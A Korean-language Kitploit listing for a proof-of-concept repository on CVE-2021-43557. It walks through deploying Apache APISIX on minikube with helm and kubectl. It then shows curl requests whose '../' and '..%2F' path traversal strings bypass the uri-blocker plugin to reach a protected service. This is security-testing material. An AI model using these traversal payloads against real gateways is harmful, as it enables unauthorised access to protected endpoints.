Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
k8s-CVE-2021-43557-poc — CVE-2021-43557에 대한 PoC | Kitploit
도구/GitHubGitHub/xvnpw/k8s-cve-2021-43557-poc
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationCloud SecurityAPI Security
GitHubxvnpw/k8s-cve-2021-43557-poc

k8s-CVE-2021-43557-poc

CVE-2021-43557에 대한 PoC

저장소 보기
223494년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Installation

  • minikube 설치
  • apisix 설치:
root@kitploit:~
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
  • app.yaml 배포: kubectl apply -f app.yaml
  • routes.yaml 배포: kubectl apply -f routes.yaml

선택 사항: 앱 이미지를 변경해야 하는 경우:

  • (선택 사항) docker 이미지 빌드:
    • cd protected-service; docker build -t protected-service:0.0.1 .
    • cd public-service; docker build -t public-service:0.0.1 .
  • (선택 사항) docker 이미지를 minikube로 푸시:
    • minikube image load protected-service:0.0.1
    • minikube image load public-service:0.0.1

악용

수동으로

퍼블릭 서비스에 접근하려면:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'

200이 반환되어야 합니다.

보호된 서비스에 접근하려면:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/protected-service/protected -H 'Host: app.test'

403이 반환되어야 합니다.

uri-blocker를 우회하여 보호된 서비스에 접근하려면: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/..%2Fprotected-service/protected -H 'Host: app.test' uri-blocker를 우회하여 보호된 서비스에 접근하려면: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/../protected-service/protected -H 'Host: app.test'

두 경우 모두 200이 반환되어야 합니다.

도구 다운로드